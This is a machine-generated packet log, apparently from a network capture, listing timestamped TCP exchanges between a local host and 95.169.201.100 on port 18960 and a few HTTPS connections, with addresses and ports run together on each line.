                                                                                                                                                      Dec 4, 2024 13:58:12.339462996 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.340127945 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.340256929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.340291977 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.340935946 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.341068029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.341717005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.341756105 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.341841936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.342331886 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.342551947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.342669964 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.342784882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.343421936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.343518019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.343558073 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.344183922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.344259024 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.344301939 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.345007896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.345129967 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.345820904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.345848083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.345885992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.346601009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.346642017 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.346648932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.347368002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.347414017 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.347451925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.347491026 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.348459005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.348664045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.348711967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.349174976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.349272966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.349319935 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.349731922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.349838972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.349879980 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.350572109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.350661993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.351356030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.351402998 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.351435900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.352185011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.352229118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.352293015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.352327108 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.353002071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.353096008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.353137970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.353820086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.353914022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.353962898 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.354749918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.354876995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.355109930 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.355565071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.417377949 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.419521093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.419588089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.419624090 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.419719934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.419902086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.419944048 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.420039892 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.420742989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.420784950 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.420834064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.421591997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.421706915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.421756983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.422446012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.422544003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.422593117 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.423165083 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.423362970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.423420906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.424047947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.424155951 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.424213886 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.424802065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.424840927 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.424887896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.425606012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.425649881 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.425713062 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.426491022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.426541090 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.426872969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.427366018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.427417040 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.427474976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.428195000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.428237915 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.428268909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.428900957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.428961039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.428966999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.429555893 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.429604053 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.429678917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.430306911 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.430351019 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.430365086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.430973053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.431015015 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.431046009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.431560040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.431612968 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.431672096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.432374954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.432426929 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.432439089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.433039904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.433089972 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.433123112 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.433851004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.433897018 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.433907986 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.434602022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.434643030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.434700012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.435374022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.435415983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.435472012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.436197042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.436244965 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.436311007 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.437007904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.437060118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.437083006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.457622051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.457683086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.457693100 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.526701927 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:13.017676115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:13.017754078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:13.813647985 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:13.813757896 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:14.856420994 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:14.856476068 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:14.856534004 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:14.857979059 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:14.858027935 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:14.858078957 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:15.286485910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:15.286542892 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:15.428574085 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:15.428617954 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:15.429059029 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:15.429090977 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:16.984400034 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:16.984401941 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.040290117 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.044506073 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.044538021 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.044672966 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.044680119 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.044970036 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.044984102 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.045049906 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.045051098 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.045061111 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.045108080 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.045634985 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.045712948 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.111385107 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.111399889 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.220971107 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.334314108 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.334425926 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.336971045 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.336987972 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.337137938 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.337249041 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.338241100 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.338267088 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.514085054 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.544651985 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.718746901 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:17.718801975 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.719000101 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:17.721175909 CET49741443192.168.2.420.12.23.50
                                                                                                                                                      Dec 4, 2024 13:58:17.721191883 CET4434974120.12.23.50192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.742180109 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.742274046 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.742338896 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.750183105 CET49735443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.750214100 CET4434973513.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.770350933 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.770416975 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:17.770531893 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.783745050 CET49734443192.168.2.413.107.9.158
                                                                                                                                                      Dec 4, 2024 13:58:17.783754110 CET4434973413.107.9.158192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.176711082 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.294811010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.294877052 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.298054934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.298089027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.298274040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.298327923 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.298343897 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.298394918 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.299021006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.299109936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.299150944 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.299699068 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.299801111 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.299894094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.300437927 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.300575018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.300611973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.301254034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.301399946 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.301505089 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.302038908 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.302103043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.302190065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.302850008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.303037882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.303069115 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.303719997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.303860903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.303900957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.304851055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.305104017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.305176973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.305517912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.305639029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.305685043 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.306190014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.306313038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.306423903 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.307010889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.307178974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.307226896 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.307790995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.307873011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.307955027 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.308489084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.308612108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.308653116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.309325933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.309389114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.309478998 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.310039997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.310187101 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.310224056 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.310832024 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.310936928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.311011076 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.311638117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.311707973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.311743975 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.312423944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.312532902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.312572002 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.313375950 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.313389063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.313433886 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.314089060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.314273119 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.314325094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.314855099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.315001965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.315049887 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.315727949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.315738916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.315777063 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.316569090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.316764116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.316809893 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.317512989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.317636013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.317677021 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.318244934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.318361044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.318406105 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.319253922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.319298029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.319364071 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.319961071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.320116997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.320159912 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.320836067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.320907116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.320986032 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.321568966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.321639061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.321681023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.322308064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.322472095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.322514057 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.323385000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.323590994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.323637962 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:18.324290037 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:18.324390888 CET189604973295.169.201.100192.168.2.4
